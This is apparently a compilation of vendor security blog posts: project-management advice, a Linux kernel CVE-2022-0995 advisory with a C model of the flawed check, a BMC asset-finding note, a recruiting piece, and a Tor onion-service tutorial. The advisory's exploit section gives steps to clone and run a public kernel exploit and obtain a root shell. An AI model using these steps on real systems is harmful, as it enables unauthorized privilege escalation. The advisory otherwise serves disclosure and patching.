
Critical Factors for the Success of Cybersecurity Projects

Not investing in cybersecurity is a mistake that can cause incalculable loss to an organization. Since the Covid-19 pandemic and the shift to home-office work, organizations' exposure to attack has grown sharply, and effective cybersecurity projects are needed across the most diverse industries.

Developing a cybersecurity project is challenging. With that in mind, this article covers the critical factors for the success of this type of initiative.

Senior Management Support

In a company, every project of real significance must be approved or rejected by senior management. If the decision is to go ahead, the engagement and cooperation of leaders are essential for the project to succeed, and the adoption of cybersecurity measures is no different.

Gaining the support of senior management is therefore one of the critical factors for the successful implementation of a cybersecurity plan. If management understands the project and trusts that it meets the demands of the business, it will be ready to adopt it.

User Awareness

Presenting the purpose and importance of cybersecurity projects is an essential part of informing users and raising their awareness. To engage employees and show how their actions affect everyone sharing a digital environment, training should use practical examples of the dangers posed by cyber risks and show how to prevent them with the tools and solutions the project provides.

Moreover, teams should know the Incident Response, Disaster Recovery, and Business Continuity Plans. This creates a greater sense of responsibility and engagement in all users, not only in those assigned to the company's IT area.

Monitoring and Control of Scope, Term, and Budget

The scope of a project maps all the work necessary for its progress and completion: the defined goals and each of the stages of implementation. Monitoring and controlling the scope means staying alert to any changes that arise during the project and managing which are necessary and which are dispensable, which fit within the available budget and schedule, and which have the approval and agreement of everyone involved.

Each of these changes must also be tracked so that time and staff assignments can be optimized and the modifications do not derail the project. Create a project scope statement and make sure all stakeholders understand it. When dealing with external clients, a change-control policy with clear restrictions is also necessary.

Conclusion

In this article you have seen the critical factors for success in developing cybersecurity projects. Did you like our content? Then share it with someone else interested in the topic.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Segura®
Segura® strives to ensure companies' sovereignty over privileged actions and information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Out-of-Bounds (OOB) Write Memory Flaw: CVE-2022-0995

Introduction:

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel's watch_queue event notification subsystem. In watch_queue_set_filter(), the limit check on user-supplied filter types was computed as sizeof(type_filter) * BITS_PER_LONG instead of the number of bits the bitmap actually holds, so an over-large type value passed the check and was then used both as a bit index into the type_filter bitmap and as a slot index into an undersized filters[] array. The resulting writes corrupt kernel heap memory, potentially allowing a local user to gain root privileges or crash the system.

Vulnerability Release Time:
  • 2022-03-14 11:43 UTC

Vulnerability Impact & Type:
  • Successful exploitation could lead to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).
  • Local privilege escalation

Affected Products:
  • Linux kernels that include the watch_queue subsystem (introduced in 5.8) and are built with CONFIG_WATCH_QUEUE enabled, up to and including 5.17-rc7

Fixed Versions:
  • Kernel 5.17-rc8 and above (commit "watch_queue: Fix filter limit check"); the fix was also backported to maintained stable branches, so check your distribution's advisory for the patched package version

Weakness (CWE-787, Out-of-bounds Write): The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when a pointer or index is incremented or decremented to a position beyond the bounds of the buffer, or when pointer arithmetic results in a position outside the valid memory region. It may result in corruption of sensitive information, a crash, or code execution.

Severity:
  • CVSS v3.1 base score: 7.8 (High), vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (NVD)
  • CVSS v2 base score: 7.2 (High); the metrics below use the v2 vocabulary
  • Access Vector: Local
  • Access Complexity: Low
  • Authentication: None
  • Confidentiality Impact: Complete
  • Integrity Impact: Complete
  • Availability Impact: Complete
  • Gained Access: None
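To make the root cause concrete, here is a user-space model of the two limit checks in watch_queue_set_filter(), written for this article rather than taken from the kernel or from the PoC repository. The kernel's filter bitmap is declared for WATCH_TYPE__NR (2) bits, so it occupies a single unsigned long. Before the fix, the first loop (which counts entries and sizes the filters[] allocation) accepted types below sizeof(type_filter) * 8, while the second loop (which fills the array and sets bitmap bits) accepted types below sizeof(type_filter) * BITS_PER_LONG, eight times larger on a 64-bit kernel. The model replays both loops over a constructed list of filter types and, instead of performing the out-of-bounds writes, counts where they would land. struct model_filter, struct outcome and simulate_set_filter() are names chosen here, not kernel symbols.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Added illustration of CVE-2022-0995, not kernel code. The struct below
 * only mimics the part of struct watch_filter that matters: a bitmap
 * declared for WATCH_TYPE__NR bits, i.e. one unsigned long.
 */
#define BITS_PER_LONG   (8 * sizeof(unsigned long))
#define WATCH_TYPE__NR  2   /* WATCH_TYPE_META, WATCH_TYPE_KEY_NOTIFY */
#define BITMAP_LONGS    ((WATCH_TYPE__NR + BITS_PER_LONG - 1) / BITS_PER_LONG)

struct model_filter {
    unsigned long type_filter[BITMAP_LONGS];   /* DECLARE_BITMAP(type_filter, WATCH_TYPE__NR) */
    uint32_t nr_filters;
    /* struct watch_type_filter filters[];  -- flexible array in the kernel */
};

struct outcome {
    size_t slots_allocated;   /* filters[] entries counted by loop 1 (drives the allocation size) */
    size_t slots_written;     /* entries loop 2 actually writes */
    size_t oob_slot_writes;   /* writes that land past the allocated filters[] */
    size_t oob_bit_sets;      /* __set_bit() indices past the end of type_filter */
};

/*
 * Replay the two loops of watch_queue_set_filter() over user-supplied
 * filter types. fixed == 0 uses the pre-fix limits, fixed == 1 the
 * post-fix limit (WATCH_TYPE__NR in both loops). No memory is actually
 * overwritten; the function only records where the writes would go.
 */
static struct outcome simulate_set_filter(const uint32_t *types, size_t n, int fixed)
{
    struct outcome o = {0, 0, 0, 0};
    size_t bitmap_bits = sizeof(((struct model_filter *)0)->type_filter) * 8;

    /* Pre-fix: loop 1 compared against sizeof(type_filter) * 8 (the real bit
     * count) but loop 2 against sizeof(type_filter) * BITS_PER_LONG, so the
     * two loops disagreed on which types are "known". */
    size_t alloc_limit = fixed ? WATCH_TYPE__NR : bitmap_bits;
    size_t fill_limit  = fixed ? WATCH_TYPE__NR
                               : sizeof(((struct model_filter *)0)->type_filter) * BITS_PER_LONG;

    for (size_t i = 0; i < n; i++)          /* loop 1: count entries, size the allocation */
        if (types[i] < alloc_limit)
            o.slots_allocated++;

    for (size_t i = 0; i < n; i++) {        /* loop 2: fill filters[] and set bitmap bits */
        if (types[i] >= fill_limit)
            continue;                       /* "ignore any unknown types" */
        if (o.slots_written >= o.slots_allocated)
            o.oob_slot_writes++;            /* &wfilter->filters[nr_filter++] beyond the allocation */
        if (types[i] >= bitmap_bits)
            o.oob_bit_sets++;               /* __set_bit(type, type_filter) beyond the bitmap */
        o.slots_written++;
    }
    return o;
}

static void report(const char *label, struct outcome o)
{
    printf("%-6s allocated=%zu written=%zu oob_slot_writes=%zu oob_bit_sets=%zu\n",
           label, o.slots_allocated, o.slots_written, o.oob_slot_writes, o.oob_bit_sets);
}

int main(void)
{
    /* Constructed input: one valid type and one type far above WATCH_TYPE__NR
     * but still below sizeof(type_filter) * BITS_PER_LONG. */
    const uint32_t attacker_types[] = { 0, 100 };
    size_t n = sizeof attacker_types / sizeof attacker_types[0];

    report("buggy", simulate_set_filter(attacker_types, n, 0));
    report("fixed", simulate_set_filter(attacker_types, n, 1));
    return 0;
}
```

With the pre-fix limits the type value 100 is rejected by loop 1 (so only one slot is allocated) but accepted by loop 2, which then writes a second slot past the allocation and sets bit 100 of a 64-bit bitmap; with the fix both loops reject it. The same disagreement holds on a 32-bit build, where the limits are 32 and 128 bits.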
Mitigation: Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability. In practice the fix is a one-line limit check, so updating the kernel is the remedy. Two things are worth verifying before assuming a host is exposed: the vulnerable code is only compiled in when the running kernel was built with CONFIG_WATCH_QUEUE=y (see /boot/config-$(uname -r) or /proc/config.gz), and the fix is present if the kernel is 5.17-rc8 or newer or your distribution's advisory lists the running package as patched.

Technical Analysis / Exploits:

1. Log in to the test machine as an unprivileged user and record the kernel version (uname -r); the public PoC only works against a vulnerable build.
2. Download the exploit code from the GitHub repository:
git clone https://github.com/Bonfee/CVE-2022-0995.git
3. Change into the cloned directory:
cd CVE-2022-0995
4. Build the exploit if the repository ships only source, then run it:
./exploit
5. After the exploit completes you will have a root shell. Start a full bash session as root with:
/bin/bash
You are now in a root bash shell and can act as root on the system.

Reference:
● https://github.com/Bonfee/CVE-2022-0995
● https://nvd.nist.gov/vuln/detail/CVE-2022-0995
● https://access.redhat.com/security/cve/cve-2022-0995
#CVE-2022-0995 #Linux #kernel #Out-of-Bounds(OOB)


About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Finding MegaRAC BMC assets on your network

Earlier this week, researchers with Eclypsium shared findings on three vulnerabilities in American Megatrends (AMI) MegaRAC firmware. MegaRAC is found in the Baseboard Management Controllers (BMCs) of many server manufacturers, including AMD, Ampere Computing, ASRock, Asus, ARM, Dell EMC, Gigabyte, HPE, Huawei, Inspur, Lenovo, Nvidia, Qualcomm, Quanta, and Tyan. Successful exploitation of these vulnerabilities can give an attacker remote code execution, an administrative shell, and user enumeration. Given American Megatrends' broad reach across server manufacturers and models, the number of systems with vulnerable MegaRAC BMC firmware could be quite large.

What is the impact?

These vulnerabilities are scored as CVSS “critical” and “high” severities, and the reported vulnerability details include:

  • CVE-2022-40259 (CVSS “critical” score of 9.9) – Remote code execution via Redfish API; requires initial access to an account with callback privileges or higher
  • CVE-2022-40242 (CVSS “high” score of 8.3) – Administrative shell via default credentials
  • CVE-2022-2827 (CVSS “high” score of 7.5) – User enumeration via API request manipulation

The Eclypsium report does mention that public exposure of vulnerable BMCs appears to be "relatively low compared to recent high-profile vulnerabilities in other infrastructure products." That said, data centers where many similar servers exist, including data centers providing cloud-based resources, could offer many opportunities to an attacker who has already gained internal access, and detection of BMC exploitation can be "complex" and is likely to be missed by traditional EDR/AV, which run on the host operating system rather than on the BMC.

Are updates available?

While American Megatrends has not made a security advisory available at the time of this publication, owners and administrators of systems with MegaRAC BMC firmware should check with their server manufacturers for patched firmware updates.

Mitigations are offered in the Eclypsium report (see the “Mitigations” section), including (but not limited to) the following suggestions:

  • Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.
  • Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.

How do I find potentially vulnerable MegaRAC BMC assets with runZero?

From the Asset Inventory, use the following pre-built query to locate BMC assets running MegaRAC firmware which may need remediation:

type:"BMC" and (hw:"MegaRAC" or os:"MegaRAC")
The prebuilt query is available in the Queries Library

You can also locate all BMC assets in your environment by searching your Asset inventory for type:"BMC", which can then be triaged further.

As always, any prebuilt queries are available from our Queries Library. Check out the library for other useful inventory queries.


About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Thriving as an app security engineer: 6 reasons to work in cybersecurity

Although the application security (app sec) role can seem the same in every industry, it’s not. Businesses operating in general industries offer fewer possibilities for comprehensive professional growth than security-focused companies. That was the case for Marvin Petzolt, a Senior Application Security Engineer at Nord Security, who jumped from an application security engineer role at a music-sharing business to a security-oriented company. Let Marvin tell us in his own words what factors make app sec professionals thrive at our company.
Marvin Petzolt, Senior Application Security Engineer at Nord Security

#1 You make an impact

Many people, including me, enjoy working at a place where you can make an impact. As an app security engineer at Nord, I can influence security design and the implementation of some of the greatest cybersecurity products in the industry – NordVPN, NordPass, NordLayer, and NordLocker. By ensuring high-security standards for each product, I contribute to building meaningful, user-friendly, and security-centric consumer solutions valued by millions of people and businesses worldwide.

However, having a tangible impact on security products is not the only way I can make a difference. My security recommendations and guidelines are also taken into account when improving business operations or team workflow. For example, when I joined the Application Security Team, we would be notified of upcoming Nord product updates mainly via our automation and notification bots. However, this approach left us very little time between security testing of the upcoming feature and its release to production, which naturally increased pressure on the team.

So I initiated the concept of security product owners, establishing a bi-directional exchange between a specific Nord product and the Application Security team. This concept allowed us to improve communication between developers, team leads, and the Application Security team.

We’re now notified about upcoming changes significantly earlier, leaving us enough time for all the necessary app security tests.

#2 You can reach your full professional potential

The truth is that being an application security specialist in the general industry doesn’t let you reach your full professional potential due to the limited app security cases and tasks you’re working on. This was one of the key reasons why I left a promising application security engineer role at one of the best-known music-sharing companies. There I was securing mainly one app, so the security issues that challenged me were limited.

I wanted to face different app security cases, advance my career, and concentrate more on technical work, security design, and cryptography – things I’m passionate about.

A security-focused company like Nord Security, with its wide range of applications and potential for different security cases, seemed like a natural solution to fulfill all these goals.

#3 You work with meaningful products and interesting challenges

At Nord Security, I’m contributing to building meaningful products – such as NordVPN, NordPass, NordLayer, and NordLocker – that secure people and businesses online.

Most of the time, I focus on cryptography, security architecture, and low-level, client-side implementations. I perform occasional design reviews, threat model sessions, pentesting of features and release candidates, and security code reviews.

Still, my tasks are pretty diverse and depend on what I want to work on. One day I might look into NordLocker’s architecture and how it will encrypt files in the future. The next day, I’ll focus on reviewing the code of NordVPN’s Meshnet feature, establishing a peer-to-peer connection between two endpoints to exchange data or route internet traffic to verify that it is implemented securely. I’ll sometimes also do a black-box security assessment on the NordPass Android release client.

#4 You work with an experienced team

Working in a security-centric company like Nord Security, you can be sure that you’ll always be guided by some of the best professionals in the cybersecurity field.

If you’re facing a challenging situation that is too difficult or complex for you to cope with on your own, the whole Application Security team comes in to help. The team member with the most experience assesses the issue based on severity and validity. If it’s valid, as a team, we determine how we can support in escalating this issue and jump in to help resolve it as fast as possible.

One of the most useful insights I have received from my team is that an app sec professional doesn’t have to know or be involved in all aspects of the team’s work. Application security has many subcategories and specializations, such as Windows Security, Linux Security, Android, and iOS security. It’s hard enough to keep up with one specialization, but keeping up with all of them is nearly impossible. So it’s OK not to be an expert in all of these technologies, and this is where you can rely on the other members of your team.

Another valuable tip – don’t over-complicate. Keep it user-friendly. The perfect security solution usually doesn’t exist or comes with a heavy impact on the user experience. Having a 32-character password requirement or providing your biometric authentication for every action you take on the app doesn’t help anybody. So it is important to focus on realistic threats and put minor theoretical risks aside for later.

Finally, my team taught me how important it is to keep the cryptographic systems simple. When designing a cryptographic system, the key is to keep it as simple as possible so that anybody can understand it and be able to securely extend this system. The more features and changes are added, the more complex the system becomes. That’s why it is necessary to redesign and realign the cryptographic design from the ground up to better fit the new requirements. If you don’t do that, you have a design that nobody understands. That makes it impossible to apply the necessary security and confidentiality measures.

#5 You are given opportunities to learn

If you’re just starting out in an app security position, coming from a slightly different field, such as web or cloud security, or simply want to learn more, even in a senior position, your team and the whole company will be there to help you grow.

If you’re a newbie, one member of your team will become your onboarding buddy, helping you to get up to speed with everything that is going on in the Application Security team. Additionally, you will be provided with a dedicated document leading you through your 30- and 90-day milestones and a checklist of all the tools and access you require to get started.

To keep our team performing at its best, we have knowledge-sharing sessions, pairing sessions, and daily standups. All this helps us stay updated on each other's work, share best practices, and sharpen our skills in the app security field. As a team, we also have a Friday tradition of "self-allocated time" when we learn something new. What we choose to learn can be anything from technologies, reading blog posts, news articles, or methodologies. Have you ever wanted to learn how to develop iOS applications or do a CTF? Then self-allocated time is meant for that.

Collaboration with other teams also has a huge impact on advancing your expertise in app security. It improves your soft skills and teaches effective communication about the risks and severities of security issues. It also gives you a direct connection to developers, which means that they will come to you with questions and concerns during the development process. In turn, it gives you a unique inside look into the technical foundation of the developed software. Just like that, I learned new technologies and programming languages on the fly since they were required to understand the source code and implementation details.

At the company level, we have knowledge-sharing events. One such example is Tech Days, allowing our people to stay in tune with the latest tech and cybersecurity news, trends, and advancements.

Nord Security also offers a personal development budget that can be used for training or certifications, helping us improve in our field. Moreover, teams often visit various conferences, such as Black Hat, to keep a finger on the pulse of the latest in the field of information security.

Last but not least, everybody can have their own personal development plan. It helps me stay aligned with the overall goals of the security team and how my part might fit in the bigger picture. Personally, I would like to dive even deeper into security architecture and cryptography, so I have aligned this goal on my personal development plan in cooperation with my manager.

#6 You don’t have to convince everyone of the importance of security

As an app security specialist, you understand that security should be a top priority in every company. And if you ask a company about it, of course, they will indicate security is their number one priority but is this actually true? From my experience, you always end up arguing with product managers, product owners, and engineering managers about security improvements. Yet, in a company that has security as its main selling point, it becomes easier to motivate security changes and push people in the right direction.

All these reasons are why application security professionals thrive at Nord Security. If you also want to advance your career in this field, join the Application Security team in Lithuania, Germany, or remotely by applying HERE.


About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

The Dark Stuff – Tor – Continued

Intro

We talked about how to access the tor network, what it is, what a tor circuit and torrc file are, and other stuff. For this one, I’d like to focus on some of the core Tor concepts, as well as possible considerations, issues, weaknesses, risks inherent to Tor, and their appropriate management and mitigation.

Hidden services

A hidden service (now called an onion service) is a Tor instance that publishes a web service or any other TCP service so that it is reachable only through a .onion address. It does not have to be a relay: clients and the service each build their own Tor circuits, which meet at a rendezvous point, so the service's real IP address stays hidden behind the Tor circuit.

To host a hidden service, install a web server or whatever service you want to expose, then add the following to your torrc file:

HiddenServiceDir /var/lib/tor/service

HiddenServicePort 80 <ip>:80

Here <ip>:80 is the address Tor forwards incoming connections to. Bind the service to 127.0.0.1 and use 127.0.0.1:80 here; if the service also listens on a public interface it is reachable over the clearnet as well, which defeats the point. The HiddenServiceDir must be owned by the user Tor runs as and must not be readable by anyone else, or Tor will refuse to start the service.

On start, Tor generates a key pair for the service and writes it into HiddenServiceDir, together with a hostname file. Current Tor releases support only v3 onion services, which store the key as hs_ed25519_secret_key and hs_ed25519_public_key; the private_key file name belongs to the retired v2 service format.

example –

/var/lib/tor/service/hs_ed25519_secret_key

/var/lib/tor/service/hostname

The hostname file contains your .onion address. For a v3 service the address is derived from the service's public key, so whoever holds the secret key file can impersonate the service; protect it accordingly.

Obviously, to run a service such as this, you need to know what’s at stake, and if you’re doing it in the first place, you’re probably of the general idea to hide your IP; thus, you should appropriately harden your systems and take the risks into account.

This can be achieved in a myriad of ways, so I like to consider these topics from a more general, high-level perspective. One possible approach is isolation through virtualization and compartmentalization. Whonix also comes to mind: its two-VM setup routes all your traffic through the Whonix Gateway, and both systems are hardened and preconfigured out of the box (and should be reconfigured where necessary). This is one example of how you might make it harder for attackers to figure out your real IP address.

However, I am not an expert on how to run hidden services, far from it, I just wanted to sort of ‘define’ them, so I can tie them into our whole narrative here.

Tor2web

Tor2web lets you access hidden services with a standard web browser, without connecting to the Tor network yourself.

Basically, wherever you see a .onion URL, you can replace the suffix with .onion.to, .onion.city, .onion.cab, .onion.direct, etc. Note that this is not anonymous or private in any way: the Tor2web proxy sees your IP address and the content you request. It is just a way of reaching a hidden service without connecting to the Tor network.

From the Tor2web site:

WARNING: Tor2web only protects publishers, not readers. As a reader installing Tor Browser will give you much greater anonymity, confidentiality, and authentication than using Tor2web. Using Tor2web trades off security for convenience and usability.

Tor – reflections – .onion URLs, stuff & risk

Since the dark web is not indexed by the clear-web search engines, finding hidden services can be difficult. Places where .onion links turn up are usually hidden wikis, Twitter, Reddit, Pastebin, GitHub and internet forums, and a normal Google search will surface many of these lists as well.

*A note on hidden wikis: many websites claim to be the Hidden Wiki or the uncensored Tor hidden wiki. Be mindful when clicking links there, as you cannot always be sure where a link actually leads.

As you know, Tor is decentralized by nature, so there is no authoritative list of all hidden services, but there are hidden services whose task is to catalog known .onion addresses.

There are also Torch, Sinbad, and other dark-web search engines, but it remains up to you to decide how trustworthy they are.

While we’re on the topic, I’d like to point out that you should always be mindful of the potential risks you’re opening yourself to. Every action counts, and you should take necessary precautions, always.

A good way to illustrate this are the CTFs I participated in, that required us to investigate data collected from Tor that pertains to a slew of illegal activities. The organizers simply didn’t render any content, thus eliminating the risk for us analysts.

You could only see what was relevant for your investigation, be that a hash, bitcoin address, email address, or anything else that was of relevance and scraped to the dataset.

When you’re doing this by yourself, there’s no organizer to filter out stuff for you, so always be mindful of that.

More reflections on Tor and Mitigations

Tor prevents your ISP/local network from knowing what you visited, prevents tracking, and helps with avoiding censorship.

However, the three-letter agencies dislike Tor, mainly because Tor is the best network for these uses, so it is constantly under attack, and those attacks are mostly aimed at deanonymizing its users.

If you are in a location that might be targeted and the risk is high, or your adversary has significant resources, you should not rely on Tor alone to anonymize you.

Another big weakness for Tor is you, the user. This is due to you not having good Opsec, which will defeat the purpose of Tor, by default.

Other weaknesses are browser-based attacks, as well as attacks against the host OS.

Of course, you can mitigate and reduce the probability of these attacks and this implies you having some controls implemented.

First and foremost, go back to Opsec basics, learn it inside and out, and create your model.

You should also leverage isolation, compartmentalization/virtualization to reduce the impact and possibility of browser exploits (or other attacks) being successful.

Never install Tor on your main OS, especially if the consequences are high.

Use hardened VMs.

Just running the Tor Browser on Windows is NOT a good idea. Assume the Tor Browser is exploitable and mitigate appropriately: use isolation.

Whatever is your isolation, it also needs to be hardened.

To future proof yourself against unknown threats, you need non-persistence; you should not rely on the Tor browser to purge all that data fully reliably. However, you can get this through Tails and other live OSes, VMs or you can use whole disk encryption and secure delete. You can also use combination of these methods to better protect yourself.


Be aware of the design documentation – https://2019.www.torproject.org/projects/torbrowser/design/

Conclusion

I hope I’ve put you on a path down the rabbit hole called Tor! There’s so much more, and I will cover as much as I possibly can.

Stay tuned.

Cover image by JC Gellidon

#tor #risk #tracking #deanonymization


